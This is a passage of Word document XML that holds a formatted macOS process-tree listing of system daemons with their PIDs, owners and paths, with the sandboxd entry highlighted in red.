          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00189 root /usr/sbin/distnoted agent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00190 root /usr/sbin/universalaccessd launchd -s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00191 root /System/Library/CoreServices/Dock.app/Contents/MacOS/Dock</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00193 root /System/Library/CoreServices/SystemUIServer.app/Contents/MacOS/SystemUIServer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00194 root /System/Library/CoreServices/Finder.app/Contents/MacOS/Finder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00195 _coreaudiod /usr/sbin/coreaudiod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00198 root /usr/sbin/pboard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00199 _coreaudiod /System/Library/Frameworks/CoreAudio.framework/Versions/A/XPCServices/com.apple.audio.DriverHelper.xpc/Contents/MacOS/com.apple.audio.DriverHelper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00208 root /System/Library/PrivateFrameworks/CacheDelete.framework/deleted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00209 root /System/Library/CoreServices/backupd.bundle/Contents/Resources/TMCacheDelete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00210 root /usr/libexec/sharingd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00212 root /usr/libexec/pkd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00213 root /System/Library/PrivateFrameworks/CloudDocsDaemon.framework/Versions/A/Support/bird</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00214 root /System/Library/PrivateFrameworks/IDS.framework/identityservicesd.app/Contents/MacOS/identityservicesd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00215 root /System/Library/PrivateFrameworks/TCC.framework/Resources/tccd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> |--= 00216 root /usr/libexec/secd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00217 root /System/Library/Frameworks/ApplicationServices.framework/Frameworks/ATS.framework/Support/fontd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00221 root /usr/sbin/usernoted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00222 root /System/Library/PrivateFrameworks/CalendarAgent.framework/Executables/CalendarAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00223 root /usr/libexec/secinitd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00227 root /System/Library/CoreServices/iconservicesagent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00228 root /usr/libexec/spindump_agent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00230 root /System/Library/CoreServices/SocialPushAgent.app/Contents/MacOS/SocialPushAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00232 root /System/Library/CoreServices/Keychain Circle Notification.app/Contents/MacOS/Keychain Circle Notification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00234 root /System/Library/CoreServices/NotificationCenter.app/Contents/MacOS/NotificationCenter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00236 root /System/Library/CoreServices/AppleIDAuthAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00238 root /System/Library/PrivateFrameworks/AskPermission.framework/Versions/A/Resources/askpermissiond</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00239 root /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/Contents/MacOS/imagent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00244 root /System/Library/CoreServices/diagnostics_agent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00246 root /System/Library/PrivateFrameworks/MessagesKit.framework/Resources/soagent.app/Contents/MacOS/soagent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00248 root /System/Library/Frameworks/Accounts.framework/Versions/A/Support/accountsd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00249 root /System/Library/PrivateFrameworks/TelephonyUtilities.framework/callservicesd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00250 root /System/Library/PrivateFrameworks/IMDPersistence.framework/XPCServices/IMDPersistenceAgent.xpc/Contents/MacOS/IMDPersistenceAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00252 root /System/Library/PrivateFrameworks/CalendarAgent.framework/Versions/A/XPCServices/CalNCService.xpc/Contents/MacOS/CalNCService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00254 root /usr/sbin/filecoordinationd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00255 root /System/Library/CoreServices/Dock.app/Contents/XPCServices/com.apple.dock.extra.xpc/Contents/MacOS/com.apple.dock.extra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00256 root /usr/libexec/nsurlstoraged</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00260 root /System/Library/CoreServices/CrashReporterSupportHelper server-init</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00261 root /System/Library/PrivateFrameworks/CommerceKit.framework/Versions/A/Resources/storeaccountd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00263 root /System/Library/PrivateFrameworks/CallHistory.framework/Support/CallHistoryPluginHelper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> |--= 00264 root /System/Library/PrivateFrameworks/CallHistory.framework/Support/CallHistorySyncHelper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00265 root /System/Library/CoreServices/Spotlight.app/Contents/MacOS/Spotlight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00267 root /System/Library/CoreServices/pbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00269 root /System/Library/PrivateFrameworks/FindMyMac.framework/Resources/FindMyMacd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00270 root /System/Library/PrivateFrameworks/CloudKitDaemon.framework/Support/cloudd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00271 root /System/Library/CoreServices/Spotlight.app/Contents/XPCServices/com.apple.metadata.SpotlightNetHelper.xpc/Contents/MacOS/com.apple.metadata.SpotlightNetHelper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00273 root /System/Library/PrivateFrameworks/CommerceKit.framework/Versions/A/Resources/storelegacy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00280 root /usr/libexec/</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>sandboxd</w:t>
      </w:r>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> -n PluginProcess -n </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00281 root /System/Library/CoreServices/SubmitDiagInfo server-init</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00282 root /System/Library/Services/AppleSpell.service/Contents/MacOS/AppleSpell -psn_0_81940</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00284 root /usr/libexec/nsurlsessiond</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00286 root /System/Library/PrivateFrameworks/CoreSymbolication.framework/coresymbolicationd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00287 root /System/Library/Frameworks/InputMethodKit.framework/Versions/A/XPCServices/com.apple.InputMethodKit.UserDictionary.xpc/Contents/MacOS/com.apple.InputMethodKit.UserDictionary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00288 root /System/Library/Frameworks/AddressBook.framework/Versions/A/XPCServices/com.apple.AddressBook.InternetAccountsBridge.xpc/Contents/MacOS/com.apple.AddressBook.InternetAccountsBridge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00289 root /System/Library/Frameworks/AddressBook.framework/Versions/A/XPCServices/com.apple.AddressBook.InternetAccountsBridge.xpc/Contents/MacOS/com.apple.AddressBook.InternetAccountsBridge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00290 root /System/Library/Frameworks/AddressBook.framework/Versions/A/XPCServices/com.apple.AddressBook.InternetAccountsBridge.xpc/Contents/MacOS/com.apple.AddressBook.InternetAccountsBridge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00291 root /System/Library/PrivateFrameworks/CommerceKit.framework/Versions/A/Resources/storeassetd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00295 root /System/Library/PrivateFrameworks/CommerceKit.framework/Resources/LaterAgent.app/Contents/MacOS/LaterAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00296 root /System/Library/CoreServices/CoreServicesUIAgent.app/Contents/MacOS/CoreServicesUIAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00297 root /System/Library/PrivateFrameworks/CommerceKit.framework/Versions/A/Resources/storedownloadd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00305 root /usr/sbin/spindump</w:t>
      </w:r>
    </w:p>
